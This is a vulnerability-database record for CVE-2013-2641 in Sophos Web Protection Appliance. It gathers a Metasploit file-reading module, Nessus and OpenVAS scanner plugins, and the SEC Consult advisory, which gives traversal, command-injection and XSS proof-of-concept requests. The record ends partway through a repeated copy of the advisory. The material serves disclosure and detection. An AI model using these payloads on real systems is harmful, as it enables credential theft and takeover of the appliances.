ID: CVE-2013-2641 | Type: cve | Reporter: cve@mitre.org | Modified: 2014-03-19T13:48:00
Description
Directory traversal vulnerability in patience.cgi in Sophos Web Appliance before 3.7.8.2 allows remote attackers to read arbitrary files via the id parameter.
{"metasploit": [{"lastseen": "2020-10-12T23:01:59", "description": "This module abuses a directory traversal in Sophos Web Protection Appliance, specifically on the /cgi-bin/patience.cgi component. This module has been tested successfully on the Sophos Web Virtual Appliance v3.7.0.\n", "published": "2013-09-10T04:30:37", "type": "metasploit", "title": "Sophos Web Protection Appliance patience.cgi Directory Traversal", "bulletinFamily": "exploit", "cvelist": ["CVE-2013-2641"], "modified": "2020-10-02T20:00:37", "id": "MSF:AUXILIARY/ADMIN/HTTP/SOPHOS_WPA_TRAVERSAL", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'uri'\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpClient\n include Msf::Auxiliary::Report\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Sophos Web Protection Appliance patience.cgi Directory Traversal',\n 'Description' => %q{\n This module abuses a directory traversal in Sophos Web Protection Appliance, specifically\n on the /cgi-bin/patience.cgi component. 
This module has been tested successfully on the\n Sophos Web Virtual Appliance v3.7.0.\n },\n 'Author' =>\n [\n 'Wolfgang Ettlingers', # Vulnerability discovery\n 'juan vazquez' # Metasploit module\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'CVE', '2013-2641' ],\n [ 'OSVDB', '91953' ],\n [ 'BID', '58833' ],\n [ 'EDB', '24932' ],\n [ 'URL', 'http://www.sophos.com/en-us/support/knowledgebase/118969.aspx' ],\n [ 'URL', 'https://www.sec-consult.com/fxdata/seccons/prod/temedia/advisories_txt/20130403-0_Sophos_Web_Protection_Appliance_Multiple_Vulnerabilities.txt' ]\n ],\n 'DefaultOptions' => {\n 'SSL' => true\n },\n 'DisclosureDate' => '2013-04-03'))\n\n register_options(\n [\n Opt::RPORT(443),\n OptString.new('FILEPATH', [true, 'The name of the file to download', '/etc/passwd']),\n OptInt.new('DEPTH', [true, 'Traversal depth', 2])\n ])\n end\n\n def my_basename(filename)\n return ::File.basename(filename.gsub(/\\\\/, \"/\"))\n end\n\n def is_proficy?\n\n res = send_request_cgi(\n {\n 'uri' => \"/cgi-bin/patience.cgi\",\n 'method' => 'GET'\n })\n\n if res and res.code == 307 and res.body =~ /The patience page request was not valid/\n return true\n else\n return false\n end\n end\n\n def read_file(file)\n travs = \"\"\n travs << \"../\" * datastore['DEPTH']\n travs << file\n travs << \"%00\"\n\n print_status(\"Retrieving file contents...\")\n\n res = send_request_cgi(\n {\n 'uri' => \"/cgi-bin/patience.cgi\",\n 'method' => 'GET',\n 'encode_params' => false,\n 'vars_get' => {\n 'id' => travs\n }\n })\n\n\n if res and (res.code == 200 or res.code == 500) and res.headers['X-Sophos-PatienceID']\n return res.body\n else\n print_status(\"#{res.code}\\n#{res.body}\")\n return nil\n end\n\n end\n\n def run\n print_status(\"Checking if it's a Sophos Web Protect Appliance with the vulnerable component...\")\n if is_proficy?\n print_good(\"Check successful\")\n else\n print_error(\"Sophos Web Protect Appliance vulnerable component not found\")\n return\n end\n\n 
contents = read_file(datastore['FILEPATH'])\n if contents.nil?\n print_error(\"File not downloaded\")\n return\n end\n\n file_name = my_basename(datastore['FILEPATH'])\n path = store_loot(\n 'sophos.wpa.traversal',\n 'application/octet-stream',\n rhost,\n contents,\n file_name\n )\n print_good(\"File saved in: #{path}\")\n\n end\nend\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/admin/http/sophos_wpa_traversal.rb"}], "dsquare": [{"lastseen": "2019-05-29T15:31:57", "bulletinFamily": "exploit", "cvelist": ["CVE-2013-2641"], "description": "File disclosure vulnerability in Sophos Web Protection Appliance\n\nVulnerability Type: File Disclosure", "modified": "2014-02-10T00:00:00", "published": "2014-02-10T00:00:00", "id": "E-363", "href": "", "type": "dsquare", "title": "Sophos Web Protection Appliance 3.7.8.1 File Disclosure", "sourceData": "For the exploit source code contact DSquare Security sales team.", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2019-05-29T15:31:57", "bulletinFamily": "exploit", "cvelist": ["CVE-2013-2641", "CVE-2013-2642"], "description": "Remote command execution vulnerability in Sophos Web Protection Appliance\n\nVulnerability Type: Remote Command Execution", "modified": "2014-02-10T00:00:00", "published": "2014-02-10T00:00:00", "id": "E-370", "href": "", "type": "dsquare", "title": "Sophos Web Protection Appliance 3.7.8.1 RCE", "sourceData": "For the exploit source code contact DSquare Security sales team.", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "nessus": [{"lastseen": "2021-01-20T14:28:49", "description": "The Sophos Web Protection application running on the remote host is\naffected by a directory traversal vulnerability in the patience.cgi\nscript due to improper sanitization of user-supplied input passed to\nthe 'id' parameter. 
An unauthenticated, remote attacker can exploit\nthis to retrieve arbitrary files from the remote host subject to the\nprivileges of the user running the web server.\n\nNote that the application is reportedly affected by additional\nvulnerabilities; however, this plugin has not tested for them.", "edition": 29, "cvss3": {"score": 5.3, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"}, "published": "2013-04-09T00:00:00", "title": "Sophos Web Protection Appliance patience.cgi 'id' Parameter Directory Traversal", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-2641"], "modified": "2013-04-09T00:00:00", "cpe": ["cpe:/a:sophos:web_appliance", "x-cpe:/a:sophos:sophos_web_protection"], "id": "SOPHOS_WEB_PROTECTION_DIR_TRAVERSAL.NASL", "href": "https://www.tenable.com/plugins/nessus/65874", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(65874);\n script_version(\"1.16\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2013-2641\");\n script_bugtraq_id(58833);\n script_xref(name:\"EDB-ID\", value:\"24932\");\n\n script_name(english:\"Sophos Web Protection Appliance patience.cgi 'id' Parameter Directory Traversal\");\n script_summary(english:\"Attempts to read a file.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host is running a web application that is affected by a\ndirectory traversal vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The Sophos Web Protection application running on the remote host is\naffected by a directory traversal vulnerability in the patience.cgi\nscript due to improper sanitization of user-supplied input passed to\nthe 'id' parameter. 
An unauthenticated, remote attacker can exploit\nthis to retrieve arbitrary files from the remote host subject to the\nprivileges of the user running the web server.\n\nNote that the application is reportedly affected by additional\nvulnerabilities; however, this plugin has not tested for them.\");\n # https://www.sec-consult.com/fxdata/seccons/prod/temedia/advisories_txt/20130403-0_Sophos_Web_Protection_Appliance_Multiple_Vulnerabilities.txt\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?4aac7176\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Sophos Web Protection Appliance version 3.7.8.2 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No exploit is required\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"Sophos Web Protection Appliance 3.7.8.1 RCE\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_nessus\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/04/03\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/04/01\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/04/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:sophos:web_appliance\");\n script_set_attribute(attribute:\"cpe\", value:\"x-cpe:/a:sophos:sophos_web_protection\");\n script_end_attributes();\n\n script_category(ACT_ATTACK);\n script_family(english:\"CGI abuses\");\n\n 
script_copyright(english:\"This script is Copyright (C) 2013-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"sophos_web_protection_detect.nasl\");\n script_require_keys(\"installed_sw/sophos_web_protection\");\n script_require_ports(\"Services/www\", 443);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"webapp_func.inc\");\ninclude(\"data_protection.inc\");\n\nappname = 'Sophos Web Protection';\n\nget_install_count(app_name:'sophos_web_protection', exit_if_zero:TRUE);\nport = get_http_port(default:443);\ninstall = get_single_install(app_name:'sophos_web_protection', port:port);\n\nvuln_script = install['dir'] + '/cgi-bin/patience.cgi';\n\nfiles = make_list('/etc/passwd', 'shared.conf');\n\nfile_pats = make_array();\nfile_pats['/etc/passwd'] = \"root:.*:0:[01]:\";\nfile_pats['shared.conf'] = '# Generated by Sophox postinstall\\\\.'; # nb: yes, that's supposed to be \"Sophox\" and not \"Sophos\"\n\ncontents = '';\nvuln_req = '';\nfound_file = '';\nforeach file (files)\n{\n # Try to exploit the issue\n if (file[0] == '/')\n exploit = mult_str(str:'../', nb:12) + file + '%00';\n else\n exploit = mult_str(str:'../', nb:2) + '/persist/config/' + file + '%00';\n\n url = vuln_script + '?id=' + exploit;\n\n res = http_send_recv3(method:\"GET\", item:url, port:port, exit_on_fail:TRUE);\n\n if (egrep(pattern:file_pats[file], string:res[2]))\n {\n found_file = file;\n vuln_req = url;\n\n contents = res[2];\n break;\n }\n}\nif (!vuln_req) audit(AUDIT_WEB_APP_NOT_AFFECTED, appname, build_url(port:port, qs:install['dir']));\n\nif (report_verbosity > 0)\n{\n line_limit = 10;\n trailer = '';\n\n if ('shared.conf' >< found_file)\n {\n header =\n 'Nessus verified the issue by trying to include the application\\'s own\\n' +\n '\\'' + found_file + '\\' script and verifying its output in the response\\n' +\n 'stream using the following URL';\n\n if 
(report_verbosity > 1)\n {\n contents = data_protection::redact_etc_passwd(output:contents);\n trailer =\n 'Here is its output (limited to ' + line_limit + ' lines) :\\n' +\n '\\n' +\n crap(data:'-', length:30) + ' snip ' + crap(data:'-', length:30) + '\\n' +\n beginning_of_response(resp:contents, max_lines:line_limit) +\n crap(data:'-', length:30) + ' snip ' + crap(data:'-', length:30);\n }\n }\n else\n {\n header =\n 'Nessus was able to exploit the issue to retrieve the contents of\\n' +\n '\\'' + found_file + '\\' on the remote host using the following URL';\n\n if (report_verbosity > 1)\n {\n contents = data_protection::redact_etc_passwd(output:contents);\n trailer =\n 'Here are its contents (limited to ' + line_limit + ' lines) :\\n' +\n '\\n' +\n crap(data:'-', length:30) + ' snip ' + crap(data:'-', length:30) + '\\n' +\n beginning_of_response(resp:contents, max_lines:line_limit) +\n crap(data:'-', length:30) + ' snip ' + crap(data:'-', length:30);\n }\n }\n\n report = get_vuln_report(items:vuln_req, port:port, header:header, trailer:trailer);\n security_warning(port:port, extra:report);\n}\nelse security_warning(port);\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "openvas": [{"lastseen": "2020-05-12T17:26:58", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-2641", "CVE-2013-2643", "CVE-2013-2642"], "description": "Sophos Web Protection Appliance Web Interface is prone to multiple vulnerabilities.\n\n 1) Unauthenticated local file disclosure\n Unauthenticated users can read arbitrary files from the filesystem with the\n privileges of the ", "modified": "2020-05-08T00:00:00", "published": "2013-04-04T00:00:00", "id": "OPENVAS:1361412562310103688", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310103688", "type": "openvas", "title": "Sophos Web Protection Appliance Web Interface Multiple Vulnerabilities", "sourceData": "###############################################################################\n# OpenVAS 
Vulnerability Test\n#\n# Sophos Web Protection Appliance Web Interface Multiple Vulnerabilities\n#\n# Authors:\n# Michael Meyer <michael.meyer@greenbone.net>\n#\n# Copyright:\n# Copyright (C) 2013 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = 'cpe:/a:sophos:web_appliance';\n\nif (description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.103688\");\n script_version(\"2020-05-08T08:34:44+0000\");\n script_cve_id(\"CVE-2013-2641\", \"CVE-2013-2642\", \"CVE-2013-2643\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_name(\"Sophos Web Protection Appliance Web Interface Multiple Vulnerabilities\");\n script_tag(name:\"last_modification\", value:\"2020-05-08 08:34:44 +0000 (Fri, 08 May 2020)\");\n script_tag(name:\"creation_date\", value:\"2013-04-04 14:28:20 +0200 (Thu, 04 Apr 2013)\");\n script_xref(name:\"URL\", value:\"http://www.sophos.com/en-us/support/knowledgebase/118969.aspx\");\n script_category(ACT_ATTACK);\n script_tag(name:\"qod_type\", value:\"remote_vul\");\n script_family(\"Web application abuses\");\n script_copyright(\"Copyright (C) 2013 Greenbone Networks GmbH\");\n 
script_dependencies(\"gb_sophos_web_appliance_detect.nasl\", \"os_detection.nasl\");\n script_require_ports(\"Services/www\", 443);\n script_mandatory_keys(\"sophos/web_appliance/installed\");\n\n script_tag(name:\"solution\", value:\"The vendor released version 3.7.8.2 to address these issues. Please see the references and contact the vendor for information on how to obtain and apply the updates\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"summary\", value:\"Sophos Web Protection Appliance Web Interface is prone to multiple vulnerabilities.\n\n 1) Unauthenticated local file disclosure\n Unauthenticated users can read arbitrary files from the filesystem with the\n privileges of the 'spiderman' operating system user.\n\n 2) OS command injection\n Authenticated users can execute arbitrary commands on the underlying\n operating system with the privileges of the 'spiderman' operating system user.\n\n 3) Reflected Cross Site Scripting (XSS)\");\n\n exit(0);\n}\n\ninclude(\"http_func.inc\");\ninclude(\"http_keepalive.inc\");\ninclude(\"host_details.inc\");\ninclude(\"misc_func.inc\");\n\nif( ! port = get_app_port( cpe:CPE, service:\"www\" ) ) exit( 0 );\n\nfiles = traversal_files();\n\nforeach pattern( keys( files ) ) {\n\n file = files[pattern];\n\n url = '/cgi-bin/patience.cgi?id=../../../../../../../' + file + '%00';\n\n if( buf = http_vuln_check(port:port, url:url,pattern:pattern ) )\n {\n msg = 'By requesting the url ' + http_report_vuln_url( port:port, url:url, url_only:TRUE ) + '\\nit was possible to retrieve the file /' + file + '. Response:\\n\\n' + buf + '\\n';\n security_message(port:port, data:msg);\n exit(0);\n }\n}\n\nexit(99);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "exploitdb": [{"lastseen": "2016-02-03T00:18:09", "description": "Sophos Web Protection Appliance 3.7.8.1 - Multiple Vulnerabilities. CVE-2013-2641,CVE-2013-2642,CVE-2013-2643. 
Webapps exploit for linux platform", "published": "2013-04-08T00:00:00", "type": "exploitdb", "title": "Sophos Web Protection Appliance 3.7.8.1 - Multiple Vulnerabilities", "bulletinFamily": "exploit", "cvelist": ["CVE-2013-2641", "CVE-2013-2643", "CVE-2013-2642"], "modified": "2013-04-08T00:00:00", "id": "EDB-ID:24932", "href": "https://www.exploit-db.com/exploits/24932/", "sourceData": "SEC Consult Vulnerability Lab Security Advisory < 20130403-0 >\r\n=======================================================================\r\n title: Multiple vulnerabilities\r\n product: Sophos Web Protection Appliance\r\n vulnerable version: <= 3.7.8.1\r\n fixed version: 3.7.8.2\r\n impact: Critical\r\n CVE number: CVE-2013-2641, CVE-2013-2642, CVE-2013-2643\r\n homepage: http://www.sophos.com/\r\n found: 2013-01-14\r\n by: Wolfgang Ettlinger\r\n SEC Consult Vulnerability Lab\r\n https://www.sec-consult.com\r\n\r\n=======================================================================\r\n\r\nVendor/product description:\r\n-----------------------------\r\n\"Our award-winning Secure Web Gateway appliances make web protection easy.\r\nThey are quick to setup, simple to manage and make policy administration a\r\nsnap, even for non-technical users.\"\r\n\r\nURL: http://www.sophos.com/en-us/products/web/web-protection.aspx\r\n\r\n\r\nBusiness recommendation:\r\n------------------------\r\nSEC Consult has identified several vulnerabilities within the components of\r\nthe Sophos Web Protection Appliance in the course of a short crash test. Some\r\ncomponents have been spot-checked, while others have not been tested at all.\r\n\r\nAn attacker can get unauthorized access to the appliance and plant backdoors or\r\naccess configuration files containing credentials for other systems (eg. 
Active\r\nDirectory/FTP login) which can be used in further attacks.\r\nSince all web traffic passes through the appliance, interception of HTTP as\r\nwell as the plaintext form of HTTPS traffic (if the HTTPS Scanning feature is in use),\r\nincluding sensitive information like passwords and session Cookies is possible.\r\nIf HTTPS Scanning is enabled, the appliance holds a private key for a\r\nCertificate Authority (CA) certificate that is installed/trusted on all\r\nworkstations in the company. If this private key is compromised by an attacker,\r\narbitrary certificates can be signed. These certificates will then pass\r\nvalidation on the client machines, enabling various attacks targeting\r\nclients (MITM, phishing, evilgrade, ...).\r\n\r\nThe recommendation of SEC Consult is to switch off the product until a\r\ncomprehensive security audit based on a security source code review has been\r\nperformed and all identified security deficiencies have been resolved by the\r\nvendor.\r\n\r\nVulnerability overview/description:\r\n-----------------------------------\r\n1) Unauthenticated local file disclosure (CVE-2013-2641)\r\nUnauthenticated users can read arbitrary files from the filesystem with the\r\nprivileges of the \"spiderman\" operating system user. These files include\r\nconfiguration files containing sensitive information such as clear text\r\npasswords which can be used in other attacks.\r\nFurthermore the webserver log file which holds valid PHP session IDs can be\r\naccessed. With this information administrator users can be impersonated.\r\n\r\n2) OS command injection (CVE-2013-2642)\r\nAuthenticated users can execute arbitrary commands on the underlying\r\noperating system with the privileges of the \"spiderman\" operating system user.\r\nThis can be used to get persistent access to the affected system (eg. 
by\r\nplanting backdoors), accessing all kinds of locally stored information or\r\nintercepting web traffic that passes through the appliance.\r\nUnauthenticated users can exploit this kind of vulnerability too (depends on\r\nappliance configuration).\r\n\r\n3) Reflected Cross Site Scripting (XSS) (CVE-2013-2643)\r\nReflected Cross Site Scripting vulnerabilities were found. An attacker can use\r\nthese vulnerabilities to exploit other vulnerabilities in the web interface\r\nor to conduct phishing attacks.\r\n\r\n\r\nProof of concept:\r\n-----------------\r\n1) Unauthenticated local file disclosure (CVE-2013-2641)\r\nAs an example, an unauthenticated user can download the configuration file\r\ncontaining the salted hash of the administrator password as well as clear text\r\npasswords e.g. for FTP backup storage or Active Directory authentication:\r\n\r\nhttps://<host>/cgi-bin/patience.cgi?id=../../persist/config/shared.conf%00\r\n\r\nFurthermore the Apache access log can be retrieved. As PHP session IDs are\r\npassed via the URL rather than via Cookies, these can be found in this log\r\nfile and effectively used to impersonate administrator users:\r\n\r\nhttps://<host>/cgi-bin/patience.cgi?id=../../log/ui_access_log%00\r\n\r\nAn excerpt from the log file shows that it contains PHP session ID information\r\n(parameter \"STYLE\").\r\n<host> - - [21/Feb/2013:17:02:17 +0000] \"POST /index.php?c=dashboard HTTP/1.1\" 200 139\r\n\"https://<host>/index.php?section=configuration&c=configuration&STYLE=8514d0a3c2fc9f8d47e2988076778153\"\r\n\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:19.0) Gecko/20100101 Firefox/19.0\"\r\n\r\n\r\n2) OS command injection (CVE-2013-2642)\r\nThe \"Diagnostic Tools\" functionality allows an authenticated user to inject\r\narbitrary operating system commands enclosed in backticks (`). 
These commands\r\nare run with the privileges of the operating system user \"spiderman\":\r\n\r\nPOST /index.php?c=diagnostic_tools HTTP/1.1\r\nHost: <host>\r\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\r\nContent-Length: 92\r\nCache-Control: no-cache\r\n\r\naction=wget&section=configuration&STYLE=<valid session id>&url=%60sleep%205%60\r\n\r\n\r\nThe \"Local Site List\" functionality allows injection of arbitrary OS commands:\r\n\r\nPOST /index.php?c=local_site_list_editor HTTP/1.1\r\nHost: <host>\r\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\r\nContent-Length: 205\r\n\r\nSTYLE=<valid session\r\nid>&action=save&entries=[{\"url\"%3a+\".'`sleep+10`'\",+\"range\"%3a+\"no\",+\"tld\"%3a+\"yes\",+\"valid_range\"%3a+\"no\"}]\r\n\r\nNote: Unauthenticated users can retrieve valid session IDs using the\r\nvulnerability in 1).\r\n\r\nIf a customized template for the \"Block page\" uses the variable\r\n\"%%user_workstation%%\", an _unauthenticated_ user can inject OS commands using the\r\nfollowing URL:\r\n\r\nhttps://<host>/end-user/index.php?reason=application&client-ip=%20%60sleep+10%60\r\n\r\n\r\n3) Reflected Cross Site Scripting (XSS) (CVE-2013-2643)\r\nThe following URLs demonstrate reflected Cross Site Scripting vulnerabilities:\r\n\r\nhttps://<host>/rss.php?action=allow&xss=%3Cscript%3Ealert%28String.fromCharCode%28120,%20115,%20115%29%29%3C/script%3E\r\nhttps://<host>/end-user/errdoc.php?e=530&msg=PHNjcmlwdD5hbGVydCgneHNzJyk7PC9zY3JpcHQ%2bCg%3d%3d\r\nhttps://<host>/end-user/ftp_redirect.php?r=x&h=%3C/script%3E%3Cscript%3Ealert%281%29%3b%3C/script%3E\r\nhttps://<host>/index.php?c=blocked&reason=malware&user=&&threat=%3Cscript%3Ealert%281%29%3C/script%3E\r\n\r\nAs the application uses URL parameters to transmit session IDs rather\r\nthan cookies, session stealing attacks cannot be executed using these flaws.\r\nHowever, these vulnerabilities can still be used to fake login pages for\r\nphishing purposes.\r\nFurthermore the 
vulnerabilities in 1) and 2) can be exploited via one of the\r\nXSS vulnerabilities. This enables attacks on the appliance even when the\r\nweb interface would otherwise not be reachable to the attacker.\r\n\r\nPossible attack scenario:\r\nUse XSS to run malicious Javascript in the browser of a user who has network\r\naccess to the web interface. This code can:\r\n- Exploit the local file disclosure vulnerability (see 1) in order to gain\r\n access to valid session IDs and impersonate administrator users.\r\n- Exploit the OS command injection (see 2) in order to execute arbitrary\r\n commands on the system.\r\n- Exfiltrate sensitive information like HTTP, (plaintext) HTTPS traffic or the\r\n private key for the CA certificate used for HTTPS scanning (MITM).\r\n\r\n\r\nVulnerable / tested versions:\r\n-----------------------------\r\nThe vulnerabilities have been verified to exist in the Sophos Web Protection\r\nAppliance version 3.7.8.1, which was the most recent version at the time of\r\ndiscovery.\r\n\r\n\r\nVendor contact timeline:\r\n------------------------\r\n2013-02-22: Sending advisory and proof of concept exploit via encrypted\r\n channel.\r\n2013-02-23: Vendor acknowledges receipt of advisory.\r\n2013-03-01: Vendor confirms reported issues and provides preliminary\r\n information about release dates.\r\n2013-03-07: Conference call: Addressing the risks the discovered\r\n vulnerabilities pose to customers and release schedule.\r\n2013-03-18: Vendor starts rollout of update to \"a first group of customers\".\r\n2013-04-03: SEC Consult releases coordinated security advisory.\r\n\r\n\r\nSolution:\r\n---------\r\nUpdate to Web Protection Appliance version 3.7.8.2.\r\n\r\nMore information can be found at:\r\nhttp://www.sophos.com/en-us/support/knowledgebase/118969.aspx\r\n\r\n\r\nWorkaround:\r\n-----------\r\nNo workaround available.\r\n\r\n\r\nAdvisory 
URL:\r\n--------------\r\nhttps://www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm\r\n\r\n\r\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\nSEC Consult Unternehmensberatung GmbH\r\n\r\nOffice Vienna\r\nMooslackengasse 17\r\nA-1190 Vienna\r\nAustria\r\n\r\nTel.: +43 / 1 / 890 30 43 - 0\r\nFax.: +43 / 1 / 890 30 43 - 25\r\nMail: research at sec-consult dot com\r\nhttps://www.sec-consult.com\r\nhttp://blog.sec-consult.com\r\n\r\n\r\nEOF Wolfgang Ettlinger, Stefan Viehb\u0e23\u0e16ck / @2013", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/24932/"}], "securityvulns": [{"lastseen": "2018-08-31T11:09:51", "bulletinFamily": "software", "cvelist": ["CVE-2013-2641", "CVE-2013-2643", "CVE-2013-2642"], "description": "Local files access, commands executions, crossite scripting.", "edition": 1, "modified": "2013-04-08T00:00:00", "published": "2013-04-08T00:00:00", "id": "SECURITYVULNS:VULN:12989", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:12989", "title": "Sophos Web Protection Appliance multiple security vulnerabilities", "type": "securityvulns", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:47", "bulletinFamily": "software", "cvelist": ["CVE-2013-2641", "CVE-2013-2643", "CVE-2013-2642"], "description": "\r\n\r\nSEC Consult Vulnerability Lab Security Advisory < 20130403-0 >\r\n=======================================================================\r\n title: Multiple vulnerabilities\r\n product: Sophos Web Protection Appliance\r\n vulnerable version: <= 3.7.8.1\r\n fixed version: 3.7.8.2\r\n impact: Critical\r\n CVE number: CVE-2013-2641, CVE-2013-2642, CVE-2013-2643\r\n homepage: http://www.sophos.com/\r\n found: 2013-01-14\r\n by: Wolfgang Ettlinger\r\n SEC Consult Vulnerability Lab\r\n 
https://www.sec-consult.com\r\n\r\n=======================================================================\r\n\r\nVendor/product description:\r\n-----------------------------\r\n"Our award-winning Secure Web Gateway appliances make web protection easy.\r\nThey are quick to setup, simple to manage and make policy administration a\r\nsnap, even for non-technical users."\r\n\r\nURL: http://www.sophos.com/en-us/products/web/web-protection.aspx\r\n\r\n\r\nBusiness recommendation:\r\n------------------------\r\nSEC Consult has identified several vulnerabilities within the components of\r\nthe Sophos Web Protection Appliance in the course of a short crash test. Some\r\ncomponents have been spot-checked, while others have not been tested at all.\r\n\r\nAn attacker can get unauthorized access to the appliance and plant backdoors or\r\naccess configuration files containing credentials for other systems (eg. Active\r\nDirectory/FTP login) which can be used in further attacks.\r\nSince all web traffic passes through the appliance, interception of HTTP as\r\nwell as the plaintext form of HTTPS traffic (if HTTPS Scanning feature in use),\r\nincluding sensitive information like passwords and session Cookies is possible.\r\nIf HTTPS Scanning is enabled, the appliance holds a private key for a\r\nCertificate Authority (CA) certificate that is installed/trusted on all\r\nworkstations in the company. If this private key is compromised by an attacker,\r\narbitrary certificates can be signed. 
These certificates will then pass\r\nvalidation on the client machines, enabling in various attacks targeting\r\nclients (MITM, phishing, evilgrade, ...).\r\n\r\nThe recommendation of SEC Consult is to switch off the product until a\r\ncomprehensive security audit based on a security source code review has been\r\nperformed and all identified security deficiencies have been resolved by the\r\nvendor.\r\n\r\nVulnerability overview/description:\r\n-----------------------------------\r\n1) Unauthenticated local file disclosure (CVE-2013-2641)\r\nUnauthenticated users can read arbitrary files from the filesystem with the\r\nprivileges of the "spiderman" operating system user. These files include\r\nconfiguration files containing sensitive information such as clear text\r\npasswords which can be used in other attacks.\r\nFurthermore the webserver log file which holds valid PHP session IDs can be\r\naccessed. With this information administrator users can be impersonated.\r\n\r\n2) OS command injection (CVE-2013-2642)\r\nAuthenticated users can execute arbitrary commands on the underlying\r\noperating system with the privileges of the "spiderman" operating system user.\r\nThis can be used to get persistent access to the affected system (eg. by\r\nplanting backdoors), accessing all kinds locally stored information or\r\nintercepting web traffic that passes through the appliance.\r\nUnauthenticated users can exploit this kind of vulnerability too (depends on\r\nappliance configuration).\r\n\r\n3) Reflected Cross Site Scripting (XSS) (CVE-2013-2643)\r\nReflected Cross Site Scripting vulnerabilities were found. 
An attacker can use\r\nthese vulnerabilities the exploit other vulnerabilities in the web interface\r\nor conducting phishing attacks.\r\n\r\n\r\nProof of concept:\r\n-----------------\r\n1) Unauthenticated local file disclosure (CVE-2013-2641)\r\nAs an example, an unauthenticated user can download the configuration file\r\ncontaining the salted hash of the administrator password as well as clear text\r\npasswords e.g. for FTP backup storage or Active Directory authentication:\r\n\r\nhttps://<host>/cgi-bin/patience.cgi?id=../../persist/config/shared.conf%00\r\n\r\nFurthermore the Apache access log can be retrieved. As PHP session IDs are\r\npassed via the URL rather than via Cookies, these can be found in this log\r\nfile and effectively used to impersonate administrator users:\r\n\r\nhttps://<host>/cgi-bin/patience.cgi?id=../../log/ui_access_log%00\r\n\r\nAn excerpt from the log file shows that it contains PHP session ID information\r\n(parameter "STYLE").\r\n<host> - - [21/Feb/2013:17:02:17 +0000] "POST /index.php?c=dashboard HTTP/1.1" 200 